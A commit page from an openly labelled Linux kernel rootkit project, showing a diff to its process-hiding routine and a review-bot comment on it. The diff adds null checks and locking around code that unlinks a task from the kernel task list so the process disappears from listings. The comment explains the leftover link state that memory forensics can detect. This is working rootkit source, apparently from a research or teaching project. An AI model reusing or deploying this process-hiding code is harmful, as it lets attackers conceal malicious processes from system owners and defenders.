linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 9b9b7120a05597ec6242075ef3e394f08e963766
parent 26354795f185a55c46ff0f88a55659066e0c26e8
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 03:41:52 +0100

attempt 3

Diffstat:
Mrootkit/src/pidhide.c | 6+++++-
1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -88,13 +88,17 @@ hide_pid(pid_t pid)
 rwlock_t *rwlock = (rwlock_t *)kallsyms_lookup_name("tasklist_lock");
- if (!ts)
+ if (!ts || !ts->tasks.prev || !ts->tasks.next) {
+ DEBUG_INFO("NULL SOMEWHERE\n");
 return;
+ }
+ rcu_read_lock();
 write_lock_irq(rwlock);
 ts->tasks.prev->next = ts->tasks.next;
 ts->tasks.next->prev = ts->tasks.prev;
 write_unlock_irq(rwlock);
+ rcu_read_unlock();
 }
 void
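Review bot: The unlink at the end of hide_pid has no comment saying what state it leaves behind, and that is the part an analyst reading this needs. The two stores under `write_lock_irq` only rewrite the neighbours' `tasks` links; the hidden task's own `tasks.prev`/`tasks.next` are not touched in this hunk and so still point into the list, a one-sided link that a walk over task structures in a memory image can flag. I would add above the stores `/* unlinks ts from its neighbours only; ts->tasks keeps its old prev/next */`. The new guard's `DEBUG_INFO("NULL SOMEWHERE\n")` also does not say which pointer was NULL or for which pid. hide_pid starts above the hunk, so what else it does to the task is not visible here.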